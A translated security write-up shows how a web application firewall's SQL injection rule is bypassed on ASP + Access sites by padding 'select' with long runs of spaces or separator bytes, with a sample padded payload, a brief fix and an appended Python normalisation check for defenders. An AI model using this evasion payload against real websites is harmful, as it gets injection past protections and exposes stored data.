Website security dog SQL Injection interception bypass

Source: Internet
Author: User


Website Security Dog's SQL injection protection has defects and can be bypassed.

For ASP + Access, first explore the features of the database. 1. The characters that can replace a space are %09, %0A, %0C and %0D.

2. The characters that truncate (comment out) the rest of the statement are %00, %16, %22 and %27.

Why do %22 (") and %27 (') truncate the rest of the statement? Later I tested this and found that the two characters act as comment markers only under special conditions.


However, %00 and %16 are not restricted.

Enable the Security Dog protection function and then execute the SQL statement again:

We can see that the executed statement is intercepted. Testing shows that Security Dog intercepts "select" followed by a separator and then "from", but does not intercept "select xfrom" or "select fromx" (when x is a special character it is of course still blocked).

Security Dog matches well-formed SQL statements; malformed statements do not trigger the rules. But a malformed statement does not return the result we want, so how can we get it? When Security Dog intercepts "select ... from", is the length its regular expression will match unbounded? Could a statement be made long enough to reach the matching limit, so that "from" and everything after it is no longer matched? Test this question as follows (note that one separator and several separators between tokens in an SQL statement execute identically):
SQL = select (a run of %09, %0A, %0C or %0D) * from manager
Sure enough, once the run of %09, %0A, %0C or %0D exceeds a certain length, Security Dog's defense fails!

In actual testing, the string before "from" had to be 49151 characters long (3*2^14 - 1). When plain spaces are used, the required length is shorter!

With 527 characters before "from" the defense fails (171 spaces)! It seems that Security Dog is especially sensitive to the numbers 170 and 49152!
Test statement:
SQL = select % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 2a % 20 from % 20 manager
170 spaces:

171 spaces:

Once the interception is broken, the rest of the statement, including any further keywords, passes through unchecked:

Solution:

Filter the input.
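As an added example (not the write-up's own code; the length-limited pattern below is an assumed model of the behaviour the write-up observed, not the product's actual rule), the following Python shows why URL-decoding and collapsing every run of separator bytes before matching removes the padding bypass, while a rule that only tolerates a bounded amount of whitespace is defeated exactly at the 171-space mark:

```python
import re
from urllib.parse import unquote

# Separator bytes the write-up found Access accepts in place of a space
# (%09 %0A %0C %0D and %20) plus the two unrestricted truncators (%00 %16).
PAD_RUN = re.compile(r"[ \t\n\x0c\r\x00\x16]+")

# Assumed stand-in for a length-limited rule: it tolerates at most 170
# whitespace characters between "select" and the column list, mirroring the
# cut-off the write-up observed. It is NOT the product's own pattern.
NAIVE_RULE = re.compile(r"select\s{1,170}\S.*?\s+from", re.I)

# Rule applied after normalisation: padding length can no longer matter.
ROBUST_RULE = re.compile(r"\bselect .*?\bfrom\b")


def normalize(raw: str) -> str:
    """URL-decode, then collapse every run of separator/truncator bytes to a
    single space. Truncators are treated as separators on purpose, so the
    text on both sides of them is still inspected as one statement."""
    return PAD_RUN.sub(" ", unquote(raw)).strip().lower()


def naive_check(raw: str) -> bool:
    """Decode only, then match: the model of the defeated behaviour."""
    return NAIVE_RULE.search(unquote(raw)) is not None


def robust_check(raw: str) -> bool:
    """Normalise first, then match."""
    return ROBUST_RULE.search(normalize(raw)) is not None


def build_probe(n_pad: int, sep: str = "%20") -> str:
    """Constructed test input in the shape of the write-up's test statement:
    select, a run of n_pad separators, then * from manager."""
    return "select" + sep * n_pad + "%2a%20from%20manager"


if __name__ == "__main__":
    for n in (170, 171, 49151):
        print(n, "naive:", naive_check(build_probe(n)),
              "robust:", robust_check(build_probe(n, "%09")))
```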
